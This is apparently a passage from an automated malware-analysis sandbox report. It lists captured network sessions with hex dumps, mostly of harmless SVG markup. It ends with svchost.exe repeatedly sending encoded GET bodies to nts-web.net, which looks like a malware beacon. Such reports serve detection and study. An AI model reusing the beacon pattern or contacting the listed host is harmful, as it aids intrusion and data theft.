2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
2023-03-22 04:45:57 UTC	2931	IN	Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 33 36 2c 33 33 30 2e 34 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 Data Ascii: ath class="cls-9" d="M820.36,330.46a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
2023-03-22 04:45:57 UTC	2947	IN	Data Raw: 3d 22 4d 38 35 35 2e 31 2c 33 39 31 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c Data Ascii: ="M855.1,391.54a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,
2023-03-22 04:45:57 UTC	2963	IN	Data Raw: 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c Data Ascii: .09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><
2023-03-22 04:45:57 UTC	2979	IN	Data Raw: 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c Data Ascii: 6,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,
2023-03-22 04:45:57 UTC	2995	IN	Data Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cl
2023-03-22 04:45:57 UTC	3011	IN	Data Raw: 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 Data Ascii: 84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1
2023-03-22 04:45:57 UTC	3027	IN	Data Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d Data Ascii: 18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=
2023-03-22 04:45:57 UTC	3044	IN	Data Raw: 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 Data Ascii: 66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19
2023-03-22 04:45:57 UTC	3060	IN	Data Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155
2023-03-22 04:45:57 UTC	3076	IN	Data Raw: 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c Data Ascii: 7,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M193.37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,
2023-03-22 04:45:57 UTC	3092	IN	Data Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M2
2023-03-22 04:45:57 UTC	3108	IN	Data Raw: 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 Data Ascii: 22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="
2023-03-22 04:45:57 UTC	3124	IN	Data Raw: 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d Data Ascii: ,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class=
2023-03-22 04:45:57 UTC	3140	IN	Data Raw: 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f Data Ascii: ,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/
2023-03-22 04:45:57 UTC	3156	IN	Data Raw: 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d Data Ascii: 3.18,0,0,1-4.22-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	3725	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:15 UTC	765	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net Content-Length: 4680
2023-03-22 04:45:15 UTC	765	OUT	Data Raw: 51 35 78 79 59 75 54 71 37 65 2f 78 38 2f 58 34 2b 76 7a 2b 41 51 4d 46 43 41 6f 44 35 41 50 62 31 54 66 4a 69 77 62 42 74 77 77 6e 69 4c 36 53 49 30 71 6d 48 63 58 79 78 64 44 38 70 38 61 54 43 56 63 34 52 47 4c 35 79 63 6e 62 4c 72 70 43 5a 30 63 43 72 73 66 39 2f 6b 75 51 6f 6b 4c 39 75 63 48 66 77 5a 6c 42 32 79 44 61 6a 62 61 65 4a 79 4d 4d 46 34 33 6a 31 56 48 49 2b 79 71 73 32 38 6c 44 75 4a 6e 62 57 68 41 58 54 4c 4b 32 53 37 72 65 51 74 61 50 38 33 46 69 46 50 44 64 63 50 79 6f 42 63 4d 33 43 6f 4c 75 36 66 57 2f 63 38 69 52 78 30 48 59 39 6b 76 4c 54 6e 73 50 68 38 4a 5a 52 47 6d 71 79 69 66 76 68 54 66 48 71 52 50 44 66 72 2b 50 68 7a 53 46 4f 52 33 38 4d 79 59 36 50 35 4e 6e 43 75 54 78 31 36 37 54 67 61 71 30 4c 34 38 42 4e 59 53 48 44 64 46 Data Ascii: Q5xyYuTq7e/x8/X4+vz+AQMFCAoD5APb1TfJiwbBtwwniL6SI0qmHcXyxdD8p8aTCVc4RGL5ycnbLrpCZ0cCrsf9/kuQokL9ucHfwZlB2yDajbaeJyMMF43j1VHI+yqs28lDuJnbWhAXTLK2S7reQtaP83FiFPDdcPyoBcM3CoLu6fW/c8iRx0HY9kvLTnsPh8JZRGmqyifvhTfHqRPDfr+PhzSFOR38MyY6P5NnCuTx167Tgaq0L48BNYSHDdF

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.5	18644	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:31 UTC	803	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net Content-Length: 4680
2023-03-22 04:45:31 UTC	803	OUT	Data Raw: 51 35 78 79 59 75 54 71 37 65 2f 78 38 2f 58 34 2b 76 7a 2b 41 51 4d 46 43 41 6f 44 35 41 50 62 31 54 66 4a 69 77 62 42 74 77 77 6e 69 4c 36 53 49 30 71 6d 48 63 58 79 78 64 44 38 70 38 61 54 43 56 63 34 52 47 4c 35 79 63 6e 62 4c 72 70 43 5a 30 63 43 72 73 66 39 2f 6b 75 51 6f 6b 4c 39 75 63 48 66 77 5a 6c 42 32 79 44 61 6a 62 61 65 4a 79 4d 4d 46 34 33 6a 31 56 48 49 2b 79 71 73 32 38 6c 44 75 4a 6e 62 57 68 41 58 54 4c 4b 32 53 37 72 65 51 74 61 50 38 33 46 69 46 50 44 64 63 50 79 6f 42 63 4d 33 43 6f 4c 75 36 66 57 2f 63 38 69 52 78 30 48 59 39 6b 76 4c 54 6e 73 50 68 38 4a 5a 52 47 6d 71 79 69 66 76 68 54 66 48 71 52 50 44 66 72 2b 50 68 7a 53 46 4f 52 33 38 4d 79 59 36 50 35 4e 6e 43 75 54 78 31 36 37 54 67 61 71 30 4c 34 38 42 4e 59 53 48 44 64 46 Data Ascii: 